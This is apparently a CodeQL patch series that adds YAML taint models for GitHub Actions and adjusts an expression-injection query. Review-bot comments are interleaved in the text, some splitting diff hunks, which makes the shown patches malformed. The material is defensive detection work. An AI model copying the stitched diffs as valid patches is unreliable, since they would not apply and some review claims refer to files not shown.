 - ["jitterbit/get-changed-files", "*", "output.added", "pull_request_target", "PR changed files"]
- - ["jitterbit/get-changed-files", "*", "output.modified", "pull_request", "PR changed files"]
 - ["jitterbit/get-changed-files", "*", "output.modified", "pull_request_target", "PR changed files"]
- - ["jitterbit/get-changed-files", "*", "output.removed", "pull_request", "PR changed files"]
 - ["jitterbit/get-changed-files", "*", "output.removed", "pull_request_target", "PR changed files"]
- - ["jitterbit/get-changed-files", "*", "output.renamed", "pull_request", "PR changed files"]
 - ["jitterbit/get-changed-files", "*", "output.renamed", "pull_request_target", "PR changed files"]
- - ["jitterbit/get-changed-files", "*", "output.added_modified", "pull_request", "PR changed files"]
 - ["jitterbit/get-changed-files", "*", "output.added_modified", "pull_request_target", "PR changed files"]
- - ["jitterbit/get-changed-files", "*", "output.deleted", "pull_request", "PR changed files"]
 - ["jitterbit/get-changed-files", "*", "output.deleted", "pull_request_target", "PR changed files"]
diff --git a/ql/lib/ext/tj-actions_branch-names.model.yml b/ql/lib/ext/tj-actions_branch-names.model.yml
new file mode 100644
index 000000000000..20383f415c28
--- /dev/null
+++ b/ql/lib/ext/tj-actions_branch-names.model.yml
@@ -0,0 +1,11 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sourceModel
+ data:
+ # https://github.com/tj-actions/branch-names
+ - ["tj-actions/branch-names", "*", "output.base_ref_branch", "pull_request_target", "PR base branch"]
+ - ["tj-actions/branch-names", "*", "output.current_branch", "pull_request_target", "PR current branch"]
+ - ["tj-actions/branch-names", "*", "output.head_ref_branch", "pull_request_target", "PR head branch"]
+ - ["tj-actions/branch-names", "*", "output.ref_branch", "pull_request_target", "Branch tirggering workflow run"]
+
diff --git a/ql/lib/ext/tj-actions_changed-files.model.yml b/ql/lib/ext/tj-actions_changed-files.model.yml
index fc5557db6ea9..21a0b479ef55 100644
--- a/ql/lib/ext/tj-actions_changed-files.model.yml
+++ b/ql/lib/ext/tj-actions_changed-files.model.yml
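Review bot: The description cell of the last row reads `Branch tirggering workflow run`; it should be `triggering`. The file also ends with an extra empty added line that none of the sibling model files have. Whether `output.base_ref_branch` belongs in a source model is worth a second look: under `pull_request_target` the base ref is a branch of the target repository, which an outside contributor can only select from existing names rather than compose, so if the row is kept its description should say why it is treated as externally controlled.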
@@ -3,37 +3,20 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sourceModel
 data:
- - ["tj-actions/changed-files", "*", "output.added_files", "pull_request", "PR changed files"]
 - ["tj-actions/changed-files", "*", "output.added_files", "pull_request_target", "PR changed files"]
- - ["tj-actions/changed-files", "*", "output.copied_files", "pull_request", "PR changed files"]
 - ["tj-actions/changed-files", "*", "output.copied_files", "pull_request_target", "PR changed files"]
- - ["tj-actions/changed-files", "*", "output.deleted_files", "pull_request", "PR changed files"]
 - ["tj-actions/changed-files", "*", "output.deleted_files", "pull_request_target", "PR changed files"]
- - ["tj-actions/changed-files", "*", "output.modified_files", "pull_request", "PR changed files"]
 - ["tj-actions/changed-files", "*", "output.modified_files", "pull_request_target", "PR changed files"]
- - ["tj-actions/changed-files", "*", "output.renamed_files", "pull_request", "PR changed files"]
 - ["tj-actions/changed-files", "*", "output.renamed_files", "pull_request_target", "PR changed files"]
- - ["tj-actions/changed-files", "*", "output.all_old_new_renamed_files", "pull_request", "PR changed files"]
 - ["tj-actions/changed-files", "*", "output.all_old_new_renamed_files", "pull_request_target", "PR changed files"]
- - ["tj-actions/changed-files", "*", "output.type_changed_files", "pull_request", "PR changed files"]
 - ["tj-actions/changed-files", "*", "output.type_changed_files", "pull_request_target", "PR changed files"]
- - ["tj-actions/changed-files", "*", "output.unmerged_files", "pull_request", "PR changed files"]
 - ["tj-actions/changed-files", "*", "output.unmerged_files", "pull_request_target", "PR changed files"]
- - ["tj-actions/changed-files", "*", "output.unknown_files", "pull_request", "PR changed files"]
 - ["tj-actions/changed-files", "*", "output.unknown_files", "pull_request_target", "PR changed files"]
- - ["tj-actions/changed-files", "*", 
"output.all_changed_and_modified_files", "pull_request", "PR changed files"]
 - ["tj-actions/changed-files", "*", "output.all_changed_and_modified_files", "pull_request_target", "PR changed files"]
- - ["tj-actions/changed-files", "*", "output.all_changed_files", "pull_request", "PR changed files"]
 - ["tj-actions/changed-files", "*", "output.all_changed_files", "pull_request_target", "PR changed files"]
- - ["tj-actions/changed-files", "*", "output.other_changed_files", "pull_request", "PR changed files"]
 - ["tj-actions/changed-files", "*", "output.other_changed_files", "pull_request_target", "PR changed files"]
- - ["tj-actions/changed-files", "*", "output.all_modified_files", "pull_request", "PR changed files"]
 - ["tj-actions/changed-files", "*", "output.all_modified_files", "pull_request_target", "PR changed files"]
- - ["tj-actions/changed-files", "*", "output.other_modified_files", "pull_request", "PR changed files"]
 - ["tj-actions/changed-files", "*", "output.other_modified_files", "pull_request_target", "PR changed files"]
- - ["tj-actions/changed-files", "*", "output.other_deleted_files", "pull_request", "PR changed files"]
 - ["tj-actions/changed-files", "*", "output.other_deleted_files", "pull_request_target", "PR changed files"]
- - ["tj-actions/changed-files", "*", "output.modified_keys", "pull_request", "PR changed files"]
 - ["tj-actions/changed-files", "*", "output.modified_keys", "pull_request_target", "PR changed files"]
- - ["tj-actions/changed-files", "*", "output.changed_keys", "pull_request", "PR changed files"]
 - ["tj-actions/changed-files", "*", "output.changed_keys", "pull_request_target", "PR changed files"]
diff --git a/ql/lib/ext/tj-actions_verify-changed-files.model.yml b/ql/lib/ext/tj-actions_verify-changed-files.model.yml
index 76d83bd249e1..9b6649892afa 100644
--- a/ql/lib/ext/tj-actions_verify-changed-files.model.yml
+++ b/ql/lib/ext/tj-actions_verify-changed-files.model.yml
@@ -3,5 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sourceModel
 data:
- - ["tj-actions/verify-changed-files", "*", "output.changed-files", "pull_request", "PR changed files"]
 - ["tj-actions/verify-changed-files", "*", "output.changed-files", "pull_request_target", "PR changed files"]
diff --git a/ql/src/Security/CWE-094/CriticalExpressionInjection.ql b/ql/src/Security/CWE-094/CriticalExpressionInjection.ql
index 624bd32e45cb..a6baf060c9d8 100644
--- a/ql/src/Security/CWE-094/CriticalExpressionInjection.ql
+++ b/ql/src/Security/CWE-094/CriticalExpressionInjection.ql
@@ -42,6 +42,6 @@ where
 .asExpr()
 .(Statement)
 .getEnclosingWorkflowStmt()
- .hasTriggerEvent("pull_request_target")
+ .hasTriggerEvent(source.getNode().(RemoteFlowSource).getATriggerEvent())
 select sink.getNode(), source, sink,
 "Potential expression injection, which may be controlled by an external user."
From e1d6c7dac413e8d0b6564678998613797097468c Mon Sep 17 00:00:00 2001
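Review bot: Now that the trigger is derived from the source, the alert message on the last line is still the generic one shared with ExpressionInjection.ql; naming the event makes triage much faster. Binding it in `from` (that line is outside the hunk) and using it in both places does it in three lines: `from MyFlow::PathNode source, MyFlow::PathNode sink, string trigger`, `.hasTriggerEvent(trigger) and trigger = source.getNode().(RemoteFlowSource).getATriggerEvent()`, and `"Potential expression injection reachable from the '" + trigger + "' event, which may be controlled by an external user."`. Because `getATriggerEvent()` can have several values for one `EventSource`, this yields one result per matching event, whereas the current `exists`-style check collapses them; either is defensible, but the choice should be stated in a comment on the `where` clause.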
From: jorgectf Date: Wed, 21 Feb 2024 15:29:27 +0100 Subject: [PATCH 065/707] Add some steps --- ql/lib/ext/akhileshns_heroku-deploy.model.yml | 6 ++++++ ql/lib/ext/android-actions_setup-android.model.yml | 6 ++++++ .../ext/apple-actions_import-codesign-certs.model.yml | 6 ++++++ .../ashley-taylor_read-json-property-action.model.yml | 6 ++++++ .../ext/ashley-taylor_regex-property-action.model.yml | 7 +++++++ ql/lib/ext/aszc_change-string-case-action.model.yml | 8 ++++++++ .../aws-actions_configure-aws-credentials.model.yml | 11 +++++++++++ ql/lib/ext/bobheadxi_deployments.model.yml | 6 ++++++ ql/lib/ext/bufbuild_buf-breaking-action.model.yml | 6 ++++++ ql/lib/ext/bufbuild_buf-lint-action.model.yml | 6 ++++++ ql/lib/ext/cachix_cachix-action.model.yml | 6 ++++++ ql/lib/ext/coursier_cache-action.model.yml | 6 ++++++ ql/lib/ext/crazy-max_ghaction-import-gpg.model.yml | 6 ++++++ ql/lib/ext/csexton_release-asset-action.model.yml | 6 ++++++ ql/lib/ext/delaguardo_setup-clojure.model.yml | 6 ++++++ ql/lib/ext/frabert_replace-string-action.model.yml | 4 ++-- .../ext/franzdiebold_github-env-vars-action.model.yml | 7 +++++++ ql/lib/ext/game-ci_unity-test-runner.model.yml | 6 ++++++ ql/lib/ext/getsentry_action-release.model.yml | 7 +++++++ ql/lib/ext/github_codeql-action.model.yml | 6 ++++++ ql/lib/ext/gradle_gradle-build-action.model.yml | 8 ++++++++ ql/lib/ext/haya14busa_action-cond.model.yml | 7 +++++++ ql/lib/ext/hexlet_project-action.model.yml | 6 ++++++ ql/lib/ext/jsdaniell_create-json.model.yml | 8 ++++++++ ql/lib/ext/jwalton_gh-ecr-push.model.yml | 6 ++++++ .../ext/khan_pull-request-comment-trigger.model.yml | 7 +++++++ ...ner_circleci-artifacts-redirector-action.model.yml | 6 ++++++ .../mad9000_actions-find-and-replace-string.model.yml | 4 ++-- ql/lib/ext/mattdavis0351_actions.model.yml | 7 +++++++ .../ext/metro-digital_setup-tools-for-waas.model.yml | 6 ++++++ ql/lib/ext/mishakav_pytest-coverage-comment.model.yml | 6 ++++++ ql/lib/ext/mymindstorm_setup-emsdk.model.yml 
| 6 ++++++ ql/lib/ext/ruby_setup-ruby.model.yml | 6 ++++++ ...alsify_action-detect-and-tag-new-version.model.yml | 6 ++++++ ql/lib/ext/shallwefootball_upload-s3-action.model.yml | 6 ++++++ ql/lib/ext/shogo82148_actions-setup-perl.model.yml | 6 ++++++ ql/lib/ext/suisei-cn_actions-download-file.model.yml | 6 ++++++ ql/lib/ext/timheuer_base64-to-file.model.yml | 7 +++++++ ql/lib/ext/tzkhan_pr-update-action.model.yml | 6 ++++++ ql/lib/ext/xt0rted_slash-command-action.model.yml | 7 +++++++ 40 files changed, 251 insertions(+), 4 deletions(-) create mode 100644 ql/lib/ext/akhileshns_heroku-deploy.model.yml create mode 100644 ql/lib/ext/android-actions_setup-android.model.yml create mode 100644 ql/lib/ext/apple-actions_import-codesign-certs.model.yml create mode 100644 ql/lib/ext/ashley-taylor_read-json-property-action.model.yml create mode 100644 ql/lib/ext/ashley-taylor_regex-property-action.model.yml create mode 100644 ql/lib/ext/aszc_change-string-case-action.model.yml create mode 100644 ql/lib/ext/aws-actions_configure-aws-credentials.model.yml create mode 100644 ql/lib/ext/bobheadxi_deployments.model.yml create mode 100644 ql/lib/ext/bufbuild_buf-breaking-action.model.yml create mode 100644 ql/lib/ext/bufbuild_buf-lint-action.model.yml create mode 100644 ql/lib/ext/cachix_cachix-action.model.yml create mode 100644 ql/lib/ext/coursier_cache-action.model.yml create mode 100644 ql/lib/ext/crazy-max_ghaction-import-gpg.model.yml create mode 100644 ql/lib/ext/csexton_release-asset-action.model.yml create mode 100644 ql/lib/ext/delaguardo_setup-clojure.model.yml create mode 100644 ql/lib/ext/franzdiebold_github-env-vars-action.model.yml create mode 100644 ql/lib/ext/game-ci_unity-test-runner.model.yml create mode 100644 ql/lib/ext/getsentry_action-release.model.yml create mode 100644 ql/lib/ext/github_codeql-action.model.yml create mode 100644 ql/lib/ext/gradle_gradle-build-action.model.yml create mode 100644 ql/lib/ext/haya14busa_action-cond.model.yml create mode 100644 
ql/lib/ext/hexlet_project-action.model.yml
 create mode 100644 ql/lib/ext/jsdaniell_create-json.model.yml
 create mode 100644 ql/lib/ext/jwalton_gh-ecr-push.model.yml
 create mode 100644 ql/lib/ext/khan_pull-request-comment-trigger.model.yml
 create mode 100644 ql/lib/ext/larsoner_circleci-artifacts-redirector-action.model.yml
 create mode 100644 ql/lib/ext/mattdavis0351_actions.model.yml
 create mode 100644 ql/lib/ext/metro-digital_setup-tools-for-waas.model.yml
 create mode 100644 ql/lib/ext/mishakav_pytest-coverage-comment.model.yml
 create mode 100644 ql/lib/ext/mymindstorm_setup-emsdk.model.yml
 create mode 100644 ql/lib/ext/ruby_setup-ruby.model.yml
 create mode 100644 ql/lib/ext/salsify_action-detect-and-tag-new-version.model.yml
 create mode 100644 ql/lib/ext/shallwefootball_upload-s3-action.model.yml
 create mode 100644 ql/lib/ext/shogo82148_actions-setup-perl.model.yml
 create mode 100644 ql/lib/ext/suisei-cn_actions-download-file.model.yml
 create mode 100644 ql/lib/ext/timheuer_base64-to-file.model.yml
 create mode 100644 ql/lib/ext/tzkhan_pr-update-action.model.yml
 create mode 100644 ql/lib/ext/xt0rted_slash-command-action.model.yml
diff --git a/ql/lib/ext/akhileshns_heroku-deploy.model.yml b/ql/lib/ext/akhileshns_heroku-deploy.model.yml
new file mode 100644
index 000000000000..73e49a1fb06c
--- /dev/null
+++ b/ql/lib/ext/akhileshns_heroku-deploy.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: summaryModel
+ data:
+ - ["akhileshns/heroku-deploy", "*", "input.branch", "output.status", "taint"]
diff --git a/ql/lib/ext/android-actions_setup-android.model.yml b/ql/lib/ext/android-actions_setup-android.model.yml
new file mode 100644
index 000000000000..11ea0ae79228
--- /dev/null
+++ b/ql/lib/ext/android-actions_setup-android.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: summaryModel
+ data:
+ - ["android-actions/setup-android", "*", "input.cmdline-tools-version", "output.ANDROID_COMMANDLINE_TOOLS_VERSION", "taint"]
\ No newline at end of file
diff --git a/ql/lib/ext/apple-actions_import-codesign-certs.model.yml b/ql/lib/ext/apple-actions_import-codesign-certs.model.yml
new file mode 100644
index 000000000000..2fdf6c78d53f
--- /dev/null
+++ b/ql/lib/ext/apple-actions_import-codesign-certs.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: summaryModel
+ data:
+ - ["apple-actions/import-codesign-certs", "*", "input.keychain-password", "output.keychain-password", "taint"]
\ No newline at end of file
diff --git a/ql/lib/ext/ashley-taylor_read-json-property-action.model.yml b/ql/lib/ext/ashley-taylor_read-json-property-action.model.yml
new file mode 100644
index 000000000000..fb837050879e
--- /dev/null
+++ b/ql/lib/ext/ashley-taylor_read-json-property-action.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: summaryModel
+ data:
+ - ["ashley-taylor/read-json-property-action", "*", "input.json", "output.value", "taint"]
\ No newline at end of file
diff --git a/ql/lib/ext/ashley-taylor_regex-property-action.model.yml b/ql/lib/ext/ashley-taylor_regex-property-action.model.yml
new file mode 100644
index 000000000000..d3b929956d1b
--- /dev/null
+++ b/ql/lib/ext/ashley-taylor_regex-property-action.model.yml
@@ -0,0 +1,7 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: summaryModel
+ data:
+ - ["ashley-taylor/regex-property-action", "*", "input.replacement", "output.value", "taint"]
+ - ["ashley-taylor/regex-property-action", "*", "input.value", "output.value", "taint"]
\ No newline at end of file
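Review bot: `android-actions_setup-android.model.yml` is added without a trailing newline (`\ No newline at end of file`), and the same applies to apple-actions, both ashley-taylor files and, later in this commit, bobheadxi, both bufbuild files, cachix, coursier, crazy-max, getsentry, gradle, haya14busa, jsdaniell, jwalton, khan and mattdavis0351. A newline at EOF keeps the next edit to any of these files from producing a spurious two-line diff, and the files in the same commit that do end correctly (akhileshns, csexton, delaguardo, game-ci, github, hexlet, larsoner, metro-digital) show the intended convention.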
diff --git a/ql/lib/ext/aszc_change-string-case-action.model.yml b/ql/lib/ext/aszc_change-string-case-action.model.yml
new file mode 100644
index 000000000000..f4527cf1b7f2
--- /dev/null
+++ b/ql/lib/ext/aszc_change-string-case-action.model.yml
@@ -0,0 +1,8 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: summaryModel
+ data:
+ - ["aszc/change-string-case-action", "*", "input.string", "output.capitalized", "taint"]
+ - ["aszc/change-string-case-action", "*", "input.replace-with", "output.uppercase", "taint"]
+ - ["aszc/change-string-case-action", "*", "input.replace-with", "output.lowercase", "taint"]
diff --git a/ql/lib/ext/aws-actions_configure-aws-credentials.model.yml b/ql/lib/ext/aws-actions_configure-aws-credentials.model.yml
new file mode 100644
index 000000000000..f95100942954
--- /dev/null
+++ b/ql/lib/ext/aws-actions_configure-aws-credentials.model.yml
@@ -0,0 +1,11 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: summaryModel
+ data:
+ - ["aws-actions/configure-aws-credentials", "*", "input.aws-access-key-id", "env.AWS_ACCESS_KEY_ID", "taint"]
+ - ["aws-actions/configure-aws-credentials", "*", "input.aws-access-key-id", "secret.AWS_ACCESS_KEY_ID", "taint"]
+ - ["aws-actions/configure-aws-credentials", "*", "input.aws-secret-access-key", "env.AWS_SECRET_ACCESS_KEY", "taint"]
+ - ["aws-actions/configure-aws-credentials", "*", "input.aws-secret-access-key", "secret.AWS_SECRET_ACCESS_KEY", "taint"]
+ - ["aws-actions/configure-aws-credentials", "*", "input.aws-session-token", "env.AWS_SESSION_TOKEN", "taint"]
+ - ["aws-actions/configure-aws-credentials", "*", "input.aws-session-token", "secret.AWS_SESSION_TOKEN", "taint"]
diff --git a/ql/lib/ext/bobheadxi_deployments.model.yml b/ql/lib/ext/bobheadxi_deployments.model.yml
new file mode 100644
index 000000000000..a458e229e04d
--- /dev/null
+++ b/ql/lib/ext/bobheadxi_deployments.model.yml
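Review bot: The second and third rows map `input.replace-with` to `output.uppercase` and `output.lowercase`, but `replace-with` looks copied from the frabert/replace-string-action model later in this commit; as far as I know aszc/change-string-case-action takes a single `string` input, so all three rows should read `"input.string"` — verify against the action's action.yml. A row naming an input the action does not have never matches, which silently leaves two of the three outputs unmodelled.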
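Review bot: The `secret.AWS_*` output column appears only in this file; every other summary row on the page writes to `output.*` or `env.*`, and the only prefix handling visible on the page (the `"output."`/`"env."` steps in DataFlowPrivate.qll, for sources) knows nothing of `secret.`. If the summary consumer has no `secret.` case either, the three `secret.` rows are dead and should be dropped or the prefix confirmed before merging. A one-line comment above `data:` saying which step of the action writes these environment variables would also help the next reviewer check the `env.` rows.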
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: summaryModel
+ data:
+ - ["bobheadxi/deployments", "*", "input.env", "output.env", "taint"]
\ No newline at end of file
diff --git a/ql/lib/ext/bufbuild_buf-breaking-action.model.yml b/ql/lib/ext/bufbuild_buf-breaking-action.model.yml
new file mode 100644
index 000000000000..a6cfbb6ee9e3
--- /dev/null
+++ b/ql/lib/ext/bufbuild_buf-breaking-action.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: summaryModel
+ data:
+ - ["bufbuild/buf-breaking-action", "*", "input.buf_token", "env.BUF_TOKEN", "taint"]
\ No newline at end of file
diff --git a/ql/lib/ext/bufbuild_buf-lint-action.model.yml b/ql/lib/ext/bufbuild_buf-lint-action.model.yml
new file mode 100644
index 000000000000..9fb754ea9e14
--- /dev/null
+++ b/ql/lib/ext/bufbuild_buf-lint-action.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: summaryModel
+ data:
+ - ["bufbuild/buf-lint-action", "*", "input.buf_token", "env.BUF_TOKEN", "taint"]
\ No newline at end of file
diff --git a/ql/lib/ext/cachix_cachix-action.model.yml b/ql/lib/ext/cachix_cachix-action.model.yml
new file mode 100644
index 000000000000..bd9563317fb5
--- /dev/null
+++ b/ql/lib/ext/cachix_cachix-action.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: summaryModel
+ data:
+ - ["cachix/cachix-action", "*", "input.signingKey", "env.CACHIX_SIGNING_KEY", "taint"]
\ No newline at end of file
diff --git a/ql/lib/ext/coursier_cache-action.model.yml b/ql/lib/ext/coursier_cache-action.model.yml
new file mode 100644
index 000000000000..951a297207de
--- /dev/null
+++ b/ql/lib/ext/coursier_cache-action.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: summaryModel
+ data:
+ - ["coursier/cache-action", "*", "input.path", "env.COURSIER_CACHE", "taint"]
\ No newline at end of file
diff --git a/ql/lib/ext/crazy-max_ghaction-import-gpg.model.yml b/ql/lib/ext/crazy-max_ghaction-import-gpg.model.yml
new file mode 100644
index 000000000000..ab6458028a51
--- /dev/null
+++ b/ql/lib/ext/crazy-max_ghaction-import-gpg.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: summaryModel
+ data:
+ - ["crazy-max/ghaction-import-gpg", "*", "input.fingerprint", "output.fingerprint", "taint"]
\ No newline at end of file
diff --git a/ql/lib/ext/csexton_release-asset-action.model.yml b/ql/lib/ext/csexton_release-asset-action.model.yml
new file mode 100644
index 000000000000..084e3328dc84
--- /dev/null
+++ b/ql/lib/ext/csexton_release-asset-action.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: summaryModel
+ data:
+ - ["csexton/release-asset-action", "*", "input.release-url", "output.url", "taint"]
diff --git a/ql/lib/ext/delaguardo_setup-clojure.model.yml b/ql/lib/ext/delaguardo_setup-clojure.model.yml
new file mode 100644
index 000000000000..b2872259fe96
--- /dev/null
+++ b/ql/lib/ext/delaguardo_setup-clojure.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: summaryModel
+ data:
+ - ["delaguardo/setup-clojure", "*", "input.boot", "env.BOOT_VERSION", "taint"]
diff --git a/ql/lib/ext/frabert_replace-string-action.model.yml b/ql/lib/ext/frabert_replace-string-action.model.yml
index 76ce81b394e4..79fd5c76e4ae 100644
--- a/ql/lib/ext/frabert_replace-string-action.model.yml
+++ b/ql/lib/ext/frabert_replace-string-action.model.yml
@@ -3,5 +3,5 @@ extensions:
 pack: codeql/actions-all
 extensible: summaryModel
 data:
- - ["frabert/replace-string-action", "*", "string", "replaced", "taint"]
- - ["frabert/replace-string-action", "*", "replace-with", "replaced", "taint"]
+ - ["frabert/replace-string-action", "*", "input.string", "output.replaced", "taint"]
+ - ["frabert/replace-string-action", "*", "input.replace-with", "output.replaced", "taint"]
diff --git a/ql/lib/ext/franzdiebold_github-env-vars-action.model.yml b/ql/lib/ext/franzdiebold_github-env-vars-action.model.yml
new file mode 100644
index 000000000000..8475cb66c02d
--- /dev/null
+++ b/ql/lib/ext/franzdiebold_github-env-vars-action.model.yml
@@ -0,0 +1,7 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: sourceModel
+ data:
+ - ["franzdiebold/github-env-vars-action", "*", "output.CI_PR_DESCRIPTION", "pull_request", "PR body"]
+ - ["franzdiebold/github-env-vars-action", "*", "output.CI_PR_TITLE", "pull_request", "PR title"]
diff --git a/ql/lib/ext/game-ci_unity-test-runner.model.yml b/ql/lib/ext/game-ci_unity-test-runner.model.yml
new file mode 100644
index 000000000000..a0d4b357b5a5
--- /dev/null
+++ b/ql/lib/ext/game-ci_unity-test-runner.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: summaryModel
+ data:
+ - ["game-ci/unity-test-runner", "*", "input.artifactsPath", "output.artifactsPath", "taint"]
diff --git a/ql/lib/ext/getsentry_action-release.model.yml b/ql/lib/ext/getsentry_action-release.model.yml
new file mode 100644
index 000000000000..d416a71c91d6
--- /dev/null
+++ b/ql/lib/ext/getsentry_action-release.model.yml
@@ -0,0 +1,7 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: summaryModel
+ data:
+ - ["getsentry/action-release", "*", "input.version", "output.version", "taint"]
+ - ["getsentry/action-release", "*", "input.version_prefix", "output.version", "taint"]
\ No newline at end of file
diff --git a/ql/lib/ext/github_codeql-action.model.yml b/ql/lib/ext/github_codeql-action.model.yml
new file mode 100644
index 000000000000..3710f7e07b8a
--- /dev/null
+++ b/ql/lib/ext/github_codeql-action.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: summaryModel
+ data:
+ - ["github/codeql-action", "*", "input.output", "output.sarif-output", "taint"]
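Review bot: Both new `sourceModel` rows use the trigger `pull_request`, which the preceding patch on this page removed from every other source model as not likely exploitable, and `EventSource` in FlowSources.qll maps PR title/body to `pull_request_target`; with `pull_request` here, `hasTriggerEvent` only matches workflows running the non-privileged event, so these rows should say `pull_request_target` (or both, if that is intended). The rows also add to `pack: codeql/actions-all`, whereas every `sourceModel` file touched in the previous patch adds to `pack: githubsecuritylab/actions-all`; if the `sourceModel` extensible is declared under only one of those packs, rows under the other are ignored without any error, so one of the two needs to change. The same two points apply to khan_pull-request-comment-trigger.model.yml further down.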
diff --git a/ql/lib/ext/gradle_gradle-build-action.model.yml b/ql/lib/ext/gradle_gradle-build-action.model.yml
new file mode 100644
index 000000000000..6ea8a6c68009
--- /dev/null
+++ b/ql/lib/ext/gradle_gradle-build-action.model.yml
@@ -0,0 +1,8 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: summaryModel
+ data:
+ - ["gradle/gradle-build-action", "*", "input.cache-encryption-key", "env.GRADLE_ENCRYPTION_KEY", "taint"]
+ - ["gradle/gradle-build-action", "*", "input.build-scan-terms-of-service-agree", "env.BUILD_SCAN_TERMS_OF_SERVICE_AGREE", "taint"]
+ - ["gradle/gradle-build-action", "*", "input.build-scan-terms-of-service-url", "env.BUILD_SCAN_TERMS_OF_SERVICE_URL", "taint"]
\ No newline at end of file
diff --git a/ql/lib/ext/haya14busa_action-cond.model.yml b/ql/lib/ext/haya14busa_action-cond.model.yml
new file mode 100644
index 000000000000..f0e0752b7357
--- /dev/null
+++ b/ql/lib/ext/haya14busa_action-cond.model.yml
@@ -0,0 +1,7 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: summaryModel
+ data:
+ - ["haya14busa/action-cond", "*", "input.if_true", "output.value", "taint"]
+ - ["haya14busa/action-cond", "*", "input.if_false", "output.value", "taint"]
\ No newline at end of file
diff --git a/ql/lib/ext/hexlet_project-action.model.yml b/ql/lib/ext/hexlet_project-action.model.yml
new file mode 100644
index 000000000000..4499d91cab66
--- /dev/null
+++ b/ql/lib/ext/hexlet_project-action.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: summaryModel
+ data:
+ - ["hexlet/project-action", "*", "input.mount-path", "env.PWD", "taint"]
diff --git a/ql/lib/ext/jsdaniell_create-json.model.yml b/ql/lib/ext/jsdaniell_create-json.model.yml
new file mode 100644
index 000000000000..a0f59b9e38b0
--- /dev/null
+++ b/ql/lib/ext/jsdaniell_create-json.model.yml
@@ -0,0 +1,8 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: summaryModel
+ data:
+ - ["jsdaniell/create-json", "*", "input.name", "output.successfully", "taint"]
+ - ["jsdaniell/create-json", "*", "input.json", "output.successfully", "taint"]
+ - ["jsdaniell/create-json", "*", "input.dir", "output.successfully", "taint"]
\ No newline at end of file
diff --git a/ql/lib/ext/jwalton_gh-ecr-push.model.yml b/ql/lib/ext/jwalton_gh-ecr-push.model.yml
new file mode 100644
index 000000000000..8ae3bb0035d0
--- /dev/null
+++ b/ql/lib/ext/jwalton_gh-ecr-push.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: summaryModel
+ data:
+ - ["jwalton/gh-ecr-push", "*", "input.image", "output.imageUrl", "taint"]
\ No newline at end of file
diff --git a/ql/lib/ext/khan_pull-request-comment-trigger.model.yml b/ql/lib/ext/khan_pull-request-comment-trigger.model.yml
new file mode 100644
index 000000000000..d95c69bc5b18
--- /dev/null
+++ b/ql/lib/ext/khan_pull-request-comment-trigger.model.yml
@@ -0,0 +1,7 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: sourceModel
+ data:
+ - ["khan/pull-request-comment-trigger", "*", "output.comment_body", "issue_comment", ""]
+ - ["khan/pull-request-comment-trigger", "*", "output.comment_body", "pull_request_comment", ""]
\ No newline at end of file
diff --git a/ql/lib/ext/larsoner_circleci-artifacts-redirector-action.model.yml b/ql/lib/ext/larsoner_circleci-artifacts-redirector-action.model.yml
new file mode 100644
index 000000000000..3c60de5bb0a4
--- /dev/null
+++ b/ql/lib/ext/larsoner_circleci-artifacts-redirector-action.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: summaryModel
+ data:
+ - ["larsoner/circleci-artifacts-redirector-action", "*", "input.artifact-path", "output.url", "taint"]
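Review bot: The second `khan/pull-request-comment-trigger` row keys `output.comment_body` to an event called `pull_request_comment`, which is not a GitHub Actions webhook event: comments in a pull request's conversation arrive as `issue_comment` (already covered by the first row) and inline review comments as `pull_request_review_comment`. If the fourth column is matched against a workflow's `on:` triggers, that row can never fire, so workflows that hand the comment body to a shell step on review-comment events would be missed. I would replace it with `- ["khan/pull-request-comment-trigger", "*", "output.comment_body", "pull_request_review_comment", ""]`, after confirming that the action actually populates `comment_body` from that event's payload.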
